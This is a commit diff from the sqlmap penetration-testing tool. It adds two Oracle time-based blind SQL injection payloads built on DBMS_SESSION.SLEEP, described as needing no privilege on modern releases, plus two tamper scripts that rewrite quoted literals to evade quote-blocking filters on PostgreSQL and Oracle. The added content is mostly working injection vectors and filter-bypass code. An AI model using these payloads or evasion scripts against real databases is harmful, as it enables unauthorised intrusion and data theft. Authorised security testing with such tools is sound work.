Minor update for Oracle support

This commit is contained in:
Miroslav Štampar 2026-07-10 15:07:16 +02:00
parent b8fb645db0
commit 827ec0a06c
4 changed files with 137 additions and 1 deletions

View file

@ -1776,6 +1776,26 @@
</test>
<!-- Without parentesis because it never works with them, useful to exploit SQL injection in Oracle E-Business Suite Financials -->
<!-- DBMS_SESSION.SLEEP is granted to PUBLIC on Oracle 18c+ (unlike DBMS_LOCK.SLEEP, which needs an explicit grant); tried first so modern targets get a no-privilege delay, falling back to DBMS_LOCK.SLEEP on older releases -->
<test>
<title>Oracle time-based blind - Parameter replace (DBMS_SESSION.SLEEP)</title>
<stype>5</stype>
<level>3</level>
<risk>1</risk>
<clause>1,3,9</clause>
<where>3</where>
<vector>BEGIN IF ([INFERENCE]) THEN DBMS_SESSION.SLEEP([SLEEPTIME]); ELSE DBMS_SESSION.SLEEP(0); END IF; END;</vector>
<request>
<payload>BEGIN IF ([RANDNUM]=[RANDNUM]) THEN DBMS_SESSION.SLEEP([SLEEPTIME]); ELSE DBMS_SESSION.SLEEP(0); END IF; END;</payload>
</request>
<response>
<time>[SLEEPTIME]</time>
</response>
<details>
<dbms>Oracle</dbms>
</details>
</test>
<test>
<title>Oracle time-based blind - Parameter replace (DBMS_LOCK.SLEEP)</title>
<stype>5</stype>
@ -2072,6 +2092,25 @@
</details>
</test>
<test>
<title>Oracle time-based blind - ORDER BY, GROUP BY clause (DBMS_SESSION.SLEEP)</title>
<stype>5</stype>
<level>3</level>
<risk>1</risk>
<clause>2,3</clause>
<where>1</where>
<vector>,(BEGIN IF ([INFERENCE]) THEN DBMS_SESSION.SLEEP([SLEEPTIME]); ELSE DBMS_SESSION.SLEEP(0); END IF; END;)</vector>
<request>
<payload>,(BEGIN IF ([RANDNUM]=[RANDNUM]) THEN DBMS_SESSION.SLEEP([SLEEPTIME]); ELSE DBMS_SESSION.SLEEP(0); END IF; END;)</payload>
</request>
<response>
<time>[SLEEPTIME]</time>
</response>
<details>
<dbms>Oracle</dbms>
</details>
</test>
<test>
<title>Oracle time-based blind - ORDER BY, GROUP BY clause (DBMS_LOCK.SLEEP)</title>
<stype>5</stype>

View file

@ -20,7 +20,7 @@ from lib.core.enums import OS
from thirdparty import six
# sqlmap version (<major>.<minor>.<month>.<monthly commit>)
VERSION = "1.10.7.70"
VERSION = "1.10.7.71"
TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)

44
tamper/dollarquote.py Normal file
View file

@ -0,0 +1,44 @@
#!/usr/bin/env python
"""
Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org)
See the file 'LICENSE' for copying permission
"""
import os
import re
from lib.core.common import singleTimeWarnMessage
from lib.core.enums import DBMS
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.LOW
def dependencies():
singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.PGSQL))
def tamper(payload, **kwargs):
"""
Replaces single-quoted strings with PostgreSQL dollar-quoted strings (e.g. 'abc' -> $$abc$$)
Requirement:
* PostgreSQL
Tested against:
* PostgreSQL 9.x, 10-16
Notes:
* Useful to bypass filters that block, strip or escape the single-quote
character: dollar-quoting is quote-free and needs no escaping
* A literal already containing '$$' is left untouched
>>> tamper("SELECT 'abc' FROM t WHERE x='def'")
'SELECT $$abc$$ FROM t WHERE x=$$def$$'
"""
retVal = payload
if payload:
retVal = re.sub(r"'([^']*)'", lambda match: "$$%s$$" % match.group(1) if "$$" not in match.group(1) else match.group(0), payload)
return retVal

53
tamper/oraclequote.py Normal file
View file

@ -0,0 +1,53 @@
#!/usr/bin/env python
"""
Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org)
See the file 'LICENSE' for copying permission
"""
import os
import re
from lib.core.common import singleTimeWarnMessage
from lib.core.enums import DBMS
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.LOW
def dependencies():
singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.ORACLE))
def tamper(payload, **kwargs):
"""
Replaces single-quoted strings with Oracle alternative-quoted strings (e.g. 'abc' -> q'[abc]')
Requirement:
* Oracle 10g+
Tested against:
* Oracle 11g, 12c, 18c, 19c, 21c, 23ai
Notes:
* Useful to bypass filters that block, strip or escape the single-quote
character: q-quoting delimits the literal with a chosen bracket/char
so the inner text needs no quote at all
* The first delimiter whose characters are absent from the literal is
used; a literal that contains every candidate delimiter is left untouched
>>> tamper("SELECT 'abc' FROM DUAL")
"SELECT q'[abc]' FROM DUAL"
"""
def _quote(match):
value = match.group(1)
for start, end in (("[", "]"), ("{", "}"), ("(", ")"), ("<", ">"), ("!", "!"), ("|", "|"), ("#", "#")):
if start not in value and end not in value:
return "q'%s%s%s'" % (start, value, end)
return match.group(0)
retVal = payload
if payload:
retVal = re.sub(r"'([^']*)'", _quote, payload)
return retVal